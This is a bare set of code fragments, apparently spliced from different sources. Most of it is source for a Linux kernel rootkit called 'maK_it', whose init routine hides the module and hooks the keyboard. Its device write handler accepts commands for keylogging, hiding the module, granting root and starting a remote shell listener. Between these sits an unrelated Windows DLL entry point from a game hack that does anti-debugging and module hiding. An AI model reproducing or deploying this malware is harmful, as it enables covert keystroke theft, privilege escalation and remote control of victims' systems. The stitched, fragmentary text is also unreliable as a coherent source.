static int init_mod(void){ //hide module on start hide_module(); //Listen for keys. register_keyboard_notifier(&nb); sema_init(&s, 1); //Register a character device memset(keyBuffer, 0, sizeof(keyBuffer)); major = register_chrdev(DEVICE_MAJOR, DEVICE_NAME, &fops); if(debug == 1) printk(KERN_ALERT "maK_it: Major %i \n", DEVICE_MAJOR); if(major < 0){ if(debug == 1) printk(KERN_INFO "maK_it: Major device failed with -1"); return major; } return 0; }
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if(fdwReason == DLL_PROCESS_ATTACH) { process_command_line(); void * module_base = reinterpret_cast<void *>(hinstDLL); if(verbose) write_line("Module base: " + ail::hex_string_32(reinterpret_cast<unsigned>(hinstDLL))); initialise_dll_vector(); anti_debugging(); if(! ( hide_module(module_base) && apply_hot_patches() && install_exception_handler() && process_main_thread() && python::initialise_python() ) ) { console_output = true; write_line("A fatal error occured, the program is not going to continue, please close this window."); while(true) Sleep(0); } if(prompt_mode) initialise_console(); LoadLibrary("D2Client.dll"); } return TRUE; }
//write to device (take commands) static ssize_t write_dev(struct file *filp, const char *buff, size_t len, loff_t *posPtr){ const char *cmdPtr; const char *cmdEndPtr; int i; char c; cmdPtr = buff; cmdEndPtr = buff + len - 1; i = 0; //This section handles our commands. if(len < MAX_CMD_LENGTH){ memset(commands, 0, sizeof(commands)); while(cmdPtr != cmdEndPtr){ c = *cmdPtr; commands[i] = c; cmdPtr++; i++; } if(debug == 1) printk(KERN_ALERT "maK_it: command: %s \n",commands); if(strcmp(commands, "debug") == 0){ if(debug == 0){ debug = 1;} else{ debug = 0;} } if(strcmp(commands,"keyLogOn") == 0){ keyLogOn = 1; if(debug == 1) printk(KERN_ALERT "maK_it: Key logger on!\n"); } if(strcmp(commands, "keyLogOff") == 0){ keyLogOn = 0; if(debug == 1) printk(KERN_ALERT "maK_it: Key logger off!\n"); } if(strcmp(commands, "modHide") == 0){ hide_module(); if(debug == 1) printk(KERN_ALERT "maK_it: Module Hidden!\n"); } if(strcmp(commands, "modReveal") == 0){ reveal_module(); if(debug == 1) printk(KERN_ALERT "maK_it: Module revealed!\n"); } if(strcmp(commands, "rootMe") == 0){ root_me(); if(debug == 1) printk(KERN_ALERT "maK_it: Given r00t!\n"); } if(strcmp(commands, "shellUp") == 0){ if(shellUp == 0){ start_listener(); shellUp = 1; } if(debug == 1) printk(KERN_ALERT "maK_it: Remote Shell listener started!\n"); } if(strcmp(commands, "shellDown") == 0){ if(shellUp == 1){ kill_listener(); shellUp = 0; } if(debug == 1) printk(KERN_ALERT "maK_it: Remote Shell listener down!\n"); } if(strcmp(commands, "command") == 0) printk(KERN_EMERG "commands: debug, keyLogOn/Off, modHide/Reveal, rootMe, shellUp/Down\n"); } else{ if(debug == 1) printk(KERN_ALERT "maK_it: Command was too long.\n"); } return -EINVAL; }